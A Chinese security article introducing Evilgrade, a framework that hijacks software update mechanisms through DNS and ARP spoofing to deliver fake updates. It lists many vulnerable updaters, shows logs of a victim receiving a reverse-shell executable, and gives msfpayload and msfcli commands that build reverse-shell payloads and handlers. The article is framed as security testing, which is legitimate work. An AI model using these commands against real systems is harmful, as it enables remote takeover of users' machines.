51CTO首页
AI.x社区
博客
学堂
精品班
直播训练营
企业培训
鸿蒙开发者社区
WOT技术大会
AIGC创新中国行
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术2024年软考PMP项目管理软考资讯
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO题库小程序
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
账号设置 退出

如何使用Evilgrade测试应用程序的升级机制是否安全

作者:Alpha_h4ck
安全 数据安全
Evilgrade是一款功能强大的模块化框架,该框架允许广大研究人员通过向目标应用程序注入伪造的更新代码,并利用存在安全问题的更新实现机制来测试目标升级更新功能的安全性。该工具提供了预构建的代理以及支持快速测试的默认工作配置。

关于Evilgrade

Evilgrade是一款功能强大的模块化框架,该框架允许广大研究人员通过向目标应用程序注入伪造的更新代码,并利用存在安全问题的更新实现机制来测试目标升级更新功能的安全性。该工具提供了预构建的代理以及支持快速测试的默认工作配置。除此之外,该工具还拥有自己的WebServer和DNSServer模块。

工具使用场景

内部场景

1、内部DNS访问;

2、ARP欺骗;

3、DNS缓存投毒;

4、DHCP欺骗;

5、TCP劫持;

6、Wi-Fi访问点伪造;

外部场景

1、内部DNS访问;

2、DNS缓存投毒;

实现的模块

  • Freerip 3.30
  • Jet photo 4.7.2
  • Teamviewer 5.1.9385
  • ISOpen 4.5.0
  • Istat.
  • Gom 2.1.25.5015
  • Atube catcher 1.0.300
  • Vidbox 7.5
  • Ccleaner 2.30.1130
  • Fcleaner 1.2.9.409
  • Allmynotes 1.26
  • Notepad++ 5.8.2
  • Java 1.6.0_22 winxp/win7
  • aMSN 0.98.3
  • Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
  • Mirc 7.14
  • Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702)
  • Dap 9.5.0.3
  • Winscp 4.2.9
  • AutoIt Script 3.3.6.1
  • Clamwin 0.96.0.1
  • AppTapp Installer 3.11 (Iphone/Itunes)
  • getjar (facebook.com)
  • Google Analytics Javascript injection
  • Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
  • Winamp 5.581
  • TechTracker (cnet) 1.3.1 (Build 55)
  • Nokiasoftware firmware update 2.4.8es
  • Nokia firmware v20.2.011
  • BSplayer 2.53.1034
  • Apt ( < Ubuntu 10.04 LTS)
  • Ubertwitter 4.6 (0.971)
  • Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
  • Cpan 1.9402
  • VirtualBox (3.2.8 )
  • Express talk
  • Filezilla
  • Flashget
  • Miranda
  • Orbit
  • Photoscape.
  • Panda Antirootkit
  • Skype
  • Sunbelt
  • Superantispyware
  • Trillian <= 5.0.0.26
  • Adium 1.3.10 (Sparkle Framework)
  • VMware
  • ...

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/infobyte/evilgrade.git

工具使用

下面给出的是工具的帮助信息:

evilgrade>help

Type 'help command' for more detailed help on a command.

  Commands:

    configure -  配置模块名称

    exit      -  退出程序

    help      -  输出工具帮助信息

    reload    -  重新加载并更新所有模块

    restart   -   重启Web服务器

    set       -  配置变量

    show      - 显示对象信息

    start     -  开启Web服务器

    status    -  获取Web服务器窗台

    stop      -  停止Web服务器

    version   -  显示框架版本

 

  Object:

     options  -  显示当前模块的选项

     vhosts   -  显示当前模块的VirtualHosts

     modules  -  列举所有可用的模块

     active   -  显示活动模块

列举实现的模块:

evilgrade>show modules

 

List of modules:

===============

 

...

...

...

 

- 63 modules available.

配置指定模块:

evilgrade>conf sunjava

evilgrade(sunjava)>

开启服务(DNS服务器和WebServer):

evilgrade>start

evilgrade>

[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...

evilgrade>

[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...

 

#### Waiting for victims

 

evilgrade>

[25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/update/[.\\d]+/map\\-[.\\d]+.xml"

evilgrade>

[25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/java_update.xml\$"

evilgrade>

[25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: ".exe"

evilgrade>

[25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: "./agent/reverseshell.exe"

显示状态和日志:

evilgrade>show status

Webserver (pid 4134) already running

 

Users status:

============

 

.---------------------------------------------------------------------------------------------------------------.

| Client         | Module           | Status | Md5,Cmd,File                                                     |

+----------------+------------------+--------+------------------------------------------------------------------+

| 192.168.233.10 | modules::sunjava | send   | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe"   |

'----------------+------------------+--------+------------------------------------------------------------------'

工具高级使用

使用场景一

evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'

在这种情况下,对于每个所需的更新二进制文件,我们都可以使用 "windows/shell_reverse_tcp"这个Payload来生成伪造的更新代码,同时使用一个反向Shell连接到192.168.233.2:4141。<%OUT%><%OUT>标签专门来检测输出二进制文件的生成位置。

比如说,如果我们运行下列命令:

evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]'

那么每当我们收到一个二进制请求时,Evilgrade将编译该行并执行最终字符串"./generatebin -o /tmp/update(random).exe",然后生成不同的代理。

使用场景二

在Evilgrade外运行:

[team@faraday]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X > /tmp/reverse-shell.exe

在Evilgrade内运行:

evilgrade(sunjava)>set agent /tmp/reverse-shell.exe

生成好Payload之后,我们将得到多个处理器Handler来监听之前分配的LHOST:

[team@faraday]$ msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.100.2 LPORT=4444 E

[*] Started reverse handler on 192.168.100.2:4444

[*] Starting the payload handler...

项目地址

Evilgrade:【GitHub传送门】

参考资料

http://www.faradaysec.com/

责任编辑:武晓燕 来源: FreeBuf.COM​​
Evilgrade模块化框架
相关推荐
如何使用Vue测试测试应用程序
在整个测试案例中,您会注意到,我们更加专注于从用户肉眼能看到并与之交互的角度编写测试。以这种方式编写测试可以确保我们测试的是对应用的用户比较重要的东西。

2022-12-22 08:01:09

Vue测试库测试
如何使用 macOS 安全配置进行应用程序开发和测试
在交付任何macOS产品之前,请使用上面列出的命令检查应用程序的开发者ID和公证。它将帮助您的最终用户避免启动应用程序时可能出现的问题。您还可以从任何互联网资源下载应用程序的安装程序并安装它以模拟用户体验。

2023-08-11 07:59:15

如何避免Web应用程序安全测试API盲区?
现代应用程序远不止一堆网页,它们是通过API进行联系的一堆复杂的Web服务。那么,如何确保这些WebAPI的安全呢?

2022-02-21 14:41:21

APIWeb安全
浅析如何实现应用程序版本升级
我们在写完一个程序后,必然涉及到应用程序版本升级的问题。本文将告诉大家如何来实现它。

2010-12-27 17:04:07

应用程序版本升级
应用程序难以应用iOS安全机制 导致安全系数下降
在最新版本的iPhone软件中苹果公司推出了一款非常重要的安全功能,然而该功能很少被第三方应用软件使用,导致用户容易受到有针对性的攻击。这项安全功能采用的是所谓的地址空间布局随机化(addressspacelayoutrandomization,ASLR)技术的机制...

2011-08-05 09:59:54

Linux安全编程:如何编写安全应用程序
在当今联网的世界中,软件开发人员必须知道如何编写安全的程序,然而人们还未广泛认识到这一信息,也未向人们广泛讲授过这一信息。

2009-07-03 06:57:32

使用开源工具测试 Web 应用程序
大部分开发人员(不管他们是否测试自己的代码)至少都了解过关于代码测试的课程。Web开发人员&mdash;比大部分开发人员更了解代码测试&mdash;需要快速交付应用程序,因此常常会因为交付期限紧迫而忽略单元测试。在某些流程中,忽略对代码进行单元测试是不妥当的,因为单元测试能够测试应用程序的实际组件,并且向其他开发人员解释代码的内部工作。对Web应用程序进行功...

2009-08-27 11:40:43

ibmdw云计算
应用程序开发:使用第三方代码是否安全
本文中专家向我们介绍了编写健壮且能够抵御攻击的应用程序所需参考和学习的资料,并解答了使用第三方代码创建应用程序是否安全的问题。

2010-08-02 23:20:24

如何构建安全Web应用程序
黑客总能利用各种漏洞来进入Web应用程序。本文讨论在以安全为中心的计算机编程时,如何构建低风险的基于Web的应用程序。

2014-02-19 15:38:42

如何保证应用程序安全
安全扫描工具的选择对于企业的安全团队来说是一个重要的决定,因此需要在应用程序安全扫描工具的概述中探索选项。

2022-06-22 09:00:00

安全编程语言工具
如何基于Web应用程序安全经验来开发云应用程序?
本文我们将针对如何为云环境开发安全的应用程序以抵御常见攻击提供一些指导,并探讨一些需要落实到位的控制因素,以确保基于云的应用程序在开发和部署时的安全性。

2013-11-19 15:35:01

免费高级Web应用程序安全测试工具
比起Appscan和webinspect以及WVS,还有国产的zwell开发的JSKY,SandCat这款工具可能稍微逊色了点,但是毕竟作为免费的工具比较少,下面就来介绍一下这个工具的功能界面如下......

2009-12-21 09:54:54

Web应用程序安全测试
如何保证云原生应用程序安全
下面,我们将从报告中找出最重要的要点,找出云原生应用程序安全性最常见的问题领域,并查看部署自动化与更高级别的应用程序安全性之间是否存在关联。

2021-07-20 09:44:34

云原生应用程序安全云安全
编译器如何危及应用程序安全
对于编译器如何将人类可读的代码翻译成机器运行的机器码,大多数程序员通常只有大概的概念。

2013-10-31 10:44:54

IDE工具
使用JMeter测试JSP应用程序性能
本文介绍使用JMeter测试JSP应用程序性能,以及介绍你想测试你的JSP应用程序性能,那么你可以使用JMeter,它是由Apache软件基金会开发的开放源代码的产品。

2009-07-01 18:24:59

JSP应用程序JMeter
如何保证Web应用程序安全
Web应用程序是当今多数企业应用的前沿阵地。Web应用程序在一个复杂的混合性架构中可以发挥多种不同的功能。其涉及范围极广,从在最新的云技术上运行的面向服务的方案,到较老的多层Web应用程序,再到准许客户访问大型主机上老应用程序的Web入口,都有其应用。

2011-02-13 14:36:35

如何保证Web应用程序安全性?
Web应用程序是当今多数企业应用的前沿阵地。本文分析了保障Web应用程序的安全未必意味着延长开发周期以及如何保证Web应用程序安全性。

2013-02-18 16:12:55

应用程序日志管理:用应用程序安全合规
你的应用程序代码已经经过了审查和漏洞扫描,同时,在线的应用程序都是经过渗透测试并放置在防火墙后端的。纵深防御策略意味着你的网络上也会有各种安全控制措施,从而加强全面保护。

2012-05-29 10:04:08

如何使用KoodousFinder搜索和分析Android应用程序安全威胁
在使用该工具之前,我们首选需要访问该工具的【开发者门户】创建一个Koodous账号并获取自己的API密钥。

2023-06-28 07:21:51

KoodousFinAPI密钥
如何使用Visual Studio 2008应用程序
经过长时间学习VisualStudio2008应用程序,于是和大家分享一下,看完本文你肯定有不少收获,希望本文能教会你更多东西。

2009-12-16 15:39:37

Visual Stud
点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服